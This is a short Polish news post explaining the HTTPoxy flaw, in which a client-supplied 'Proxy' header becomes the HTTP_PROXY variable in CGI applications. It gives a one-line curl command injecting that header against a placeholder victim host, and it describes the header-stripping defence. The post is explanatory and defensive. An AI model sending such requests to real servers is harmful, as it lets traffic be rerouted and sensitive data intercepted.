P

oważna podatność została wykryta, a raczej powróciła po 15 latach (pierwsze błędy tego typu zostały odkryte i naprawione w bibliotece Perla w marcu oraz Curla w kwietniu 2001 roku). Głównie dotyka aplikacje oraz serwery działające z interfejsami CGI lub podobnymi. Wszystko sprowadza się do prostego konfliktu w nazwach zmiennych. Według RFC 3875 aplikacja CGI pobiera wartość nagłówka HTTP o nazwie Proxy (który może zostać wysłany w dowolnym żądaniu użytkownika) i zapisuje ją pod zmienną środowiskową HTTP_PROXY. Problem w tym, że ta zmienna środowiskowa jest używana do konfiguracji serwera proxy przy łączeniu się aplikacji i serwerów WWW z Internetem.

Oznacza to, że dowolna osoba, która potrafi wysłać taki nagłówek (curl -XGET --header "Proxy: 10.1.1.1" http://ofiara.pl) jest w stanie przekierować ruch naszej webaplikacji przez swój, specjalnie do tego spreparowany serwery proxy i zacząć podsłuchiwać ruch sieciowy przechwytując wrażliwe dane i wykonywać ataki typu Man in the Middle. Najprostszą formą obrony jest po prostu usuwanie tego nagłówka zanim dotrze do naszej webaplikacji. Firmy i fundacje takie jak Apache, Red Hat, US CERT, Nginx, Drupal i CloudFlare oraz wiele innych już zareagowały na ten błąd i wydały odpowiednie zalecenia oraz aktualizację.

Więcej informacji: How to Protect Your Server Against the HTTPoxy Vulnerability, What is httproxy